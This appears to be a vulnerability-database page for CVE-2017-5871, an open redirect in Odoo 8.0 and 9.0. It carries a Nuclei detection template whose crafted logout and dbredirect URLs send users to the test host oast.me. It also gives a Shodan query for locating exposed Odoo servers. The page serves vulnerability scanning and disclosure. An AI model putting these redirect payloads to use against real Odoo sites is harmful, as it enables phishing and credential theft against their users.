Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Odoo <= 8.0-20160726 & 9.0 - Open Redirect

🗓️ 12 Jun 2026 03:02:50Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 114 Views

Odoo <= 8.0-20160726 & 9.0 - Open Redirect vulnerability allows attackers to redirect users to untrusted sites via crafted URLs leading to potential phishing attacks or info theft. Update to latest patched version

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2017-5871
23 May 201901:14
circl
CNVD		Odoo Input Validation Error Vulnerability
24 May 201900:00
cnvd
CVE		CVE-2017-5871
22 May 201919:33
cve
Cvelist		CVE-2017-5871
22 May 201919:33
cvelist
Debian CVE		CVE-2017-5871
22 May 201919:33
debiancve
EUVD		EUVD-2017-14946
7 Oct 202500:30
euvd
NVD		CVE-2017-5871
22 May 201920:29
nvd
OSV		CVE-2017-5871
22 May 201920:29
osv
Prion		Design/Logic Flaw
22 May 201920:29
prion
RedhatCVE		CVE-2017-5871
22 May 202507:31
redhatcve
Rows per page
id: CVE-2017-5871

info:
  name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
  author: 1337rokudenashi
  severity: medium
  description: |
    An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
  impact: |
    Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
  remediation: |
    Update Odoo to the latest patched version provided by the vendor.
  reference:
    - https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5871
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-5871
    cwe-id: CWE-601
    epss-score: 0.02676
    epss-percentile: 0.86155
    cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Odoo"
    product: odoo
    vendor: odoo
  tags: cve2017,cve,odoo,redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/session/logout?redirect=https://oast.me"
      - "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f"
      - "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502200af29160e847e4799cac76e275d4e3c31f05b3ffbc086694b57d14a76c32778302210081601872e164a2cf3705389e0ca46c7c574e3b77597389691259b396a52e4ee7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 35.4
CVSS 25.8
EPSS0.02676
odooopen redirectcve-2017-5871url redirectionphishinginformation theftpatched versionvulnerability
114